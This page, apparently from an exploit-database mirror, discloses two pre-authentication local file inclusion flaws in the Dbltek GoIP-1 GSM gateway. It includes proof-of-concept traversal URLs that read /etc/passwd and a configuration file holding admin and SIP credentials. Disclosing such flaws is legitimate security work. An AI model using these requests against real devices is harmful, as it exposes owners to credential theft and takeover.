header-logo
Suggest Exploit
vendor:
GoIP
by:
Valtteri Lehtinen & Lassi Korhonen
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: GoIP
Affected Version From: GHSFVT-1.1-67-5
Affected Version To: GHSFVT-1.1-67-5
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: IoT device
2022

Dbltek GoIP – Local File Inclusion

Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP. The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities. Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.

Mitigation:

The device should be updated to the latest firmware version and the configuration file should not be backed up.
Source

Exploit-DB raw data:

# Exploit Title: Dbltek GoIP - Local File Inclusion
# Date: 20.02.2022
# Exploit Author: Valtteri Lehtinen & Lassi Korhonen
# Vendor Homepage: http://en.dbltek.com/index.html
# Software Link: -
# Version: GHSFVT-1.1-67-5 (firmware version)
# Tested on: Target is an IoT device

# Exploit summary
Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP.
The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities.

Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.

It is probable that also other models and versions of Dbltek GoIP devices are affected.

Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/

# Proof of Concept
Assuming the device is available on IP 192.168.9.1.

Download /etc/passwd
http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd
http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd

Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up)
http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat

Navigation

Suggest Exploit

Services By CQR